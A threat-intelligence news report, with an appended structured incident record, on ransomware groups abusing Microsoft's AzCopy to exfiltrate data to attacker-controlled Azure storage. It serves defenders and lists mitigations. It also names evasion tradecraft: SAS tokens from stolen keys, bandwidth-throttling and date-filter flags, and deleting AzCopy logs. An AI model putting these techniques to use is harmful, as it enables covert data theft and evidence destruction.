Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data Exfiltration
Ransomware operators are exploiting Microsoft’s trusted Azure data transfer tool, AzCopy, to covertly exfiltrate sensitive data before encryption. By leveraging this legitimate utility commonly used for cloud migrations and backups attackers evade detection, blending malicious activity into routine IT operations.
How the Attack Works
AzCopy, a command-line utility for moving large datasets to and from Azure Storage, is rarely flagged by endpoint detection and response (EDR) solutions due to its widespread corporate trust. Threat actors, including groups like BianLian and Rhysida, use AzCopy to bulk-upload stolen files to attacker-controlled Azure Blob storage via HTTPS connections to domains like *.blob.core.windows.net, which often bypass firewall restrictions.
Attackers gain access through compromised Azure credentials or storage keys, then generate Shared Access Signature (SAS) tokens embedded with permissions and time windows to execute transfers without interactive logins. To avoid detection, they throttle transfer speeds using the --cap-mbps flag and filter files with --include-after to target recent, high-value data.
Evasion and Detection Challenges
AzCopy’s use of legitimate cloud infrastructure and standard HTTPS traffic makes it difficult to distinguish from normal operations. In some cases, exfiltration went undetected by endpoint security tools, with attackers deleting local log files (%USERPROFILE%\.azcopy) to erase evidence. Traditional detection methods, which focus on third-party exfiltration tools, often miss these "living-off-the-land" attacks.
Mitigation and Response
Security teams must monitor for anomalous AzCopy activity, such as off-hours transfers or unusual data volumes under service accounts. User and Entity Behavior Analytics (UEBA) can flag abnormal file access, while network monitoring should restrict direct internet access from servers to known endpoints. Application control policies can limit AzCopy execution to approved hosts and accounts. Incident response plans should include steps to revoke SAS tokens, rotate keys, and coordinate with cloud providers to mitigate data loss.
As ransomware groups increasingly weaponize trusted cloud tools, organizations must adapt detection strategies to account for legitimate utilities being turned against them.
Source: https://gbhackers.com/azcopy-utility-misused/
Cyber Threat Intelligence ® cybersecurity rating report: https://www.rankiteo.com/company/cyber-threat-intel
Microsoft Security cybersecurity rating report: https://www.rankiteo.com/company/microsoft-security
"id": "CYBMIC1772619962",
"linkid": "cyber-threat-intel, microsoft-security",
"type": "Cyber Attack",
"date": "3/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"{'affected_entities': [{'type': 'Organizations using Azure and AzCopy'}],
'attack_vector': 'Compromised Azure credentials or storage keys, Shared '
'Access Signature (SAS) tokens',
'data_breach': {'data_encryption': True,
'data_exfiltration': True,
'sensitivity_of_data': 'High',
'type_of_data_compromised': 'Sensitive data, high-value '
'files'},
'description': 'Ransomware operators are exploiting Microsoft’s trusted Azure '
'data transfer tool, AzCopy, to covertly exfiltrate sensitive '
'data before encryption. By leveraging this legitimate utility '
'commonly used for cloud migrations and backups, attackers '
'evade detection, blending malicious activity into routine IT '
'operations.',
'impact': {'data_compromised': 'Sensitive data',
'operational_impact': 'Potential data loss and encryption '
'disruption',
'systems_affected': 'Azure Blob storage, corporate IT '
'infrastructure'},
'initial_access_broker': {'entry_point': 'Compromised Azure credentials or '
'storage keys',
'high_value_targets': 'Recent, high-value data'},
'lessons_learned': 'Ransomware groups are increasingly weaponizing trusted '
'cloud tools like AzCopy, requiring organizations to adapt '
'detection strategies to account for legitimate utilities '
'being turned against them.',
'motivation': 'Data exfiltration for ransomware extortion',
'post_incident_analysis': {'corrective_actions': ['Enhanced monitoring for '
'AzCopy activity',
'Restriction of AzCopy '
'execution',
'Network-level controls for '
'cloud storage access'],
'root_causes': 'Exploitation of trusted cloud '
'tools (AzCopy) and lack of '
'detection for legitimate utility '
'abuse'},
'ransomware': {'data_encryption': True,
'data_exfiltration': True,
'ransomware_strain': ['BianLian', 'Rhysida']},
'recommendations': ['Monitor for anomalous AzCopy activity (e.g., off-hours '
'transfers, unusual data volumes)',
'Use User and Entity Behavior Analytics (UEBA) to flag '
'abnormal file access',
'Restrict direct internet access from servers to known '
'endpoints',
'Implement application control policies to limit AzCopy '
'execution to approved hosts and accounts',
'Revoke SAS tokens and rotate keys as part of incident '
'response'],
'references': [{'source': 'Cyber Incident Description'}],
'response': {'containment_measures': ['Revoke SAS tokens',
'Rotate Azure storage keys',
'Coordinate with cloud providers'],
'enhanced_monitoring': 'User and Entity Behavior Analytics '
'(UEBA), network monitoring',
'remediation_measures': ['Monitor anomalous AzCopy activity',
'Restrict direct internet access from '
'servers',
'Limit AzCopy execution to approved '
'hosts and accounts']},
'threat_actor': ['BianLian', 'Rhysida'],
'title': 'Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data '
'Exfiltration',
'type': 'Ransomware'}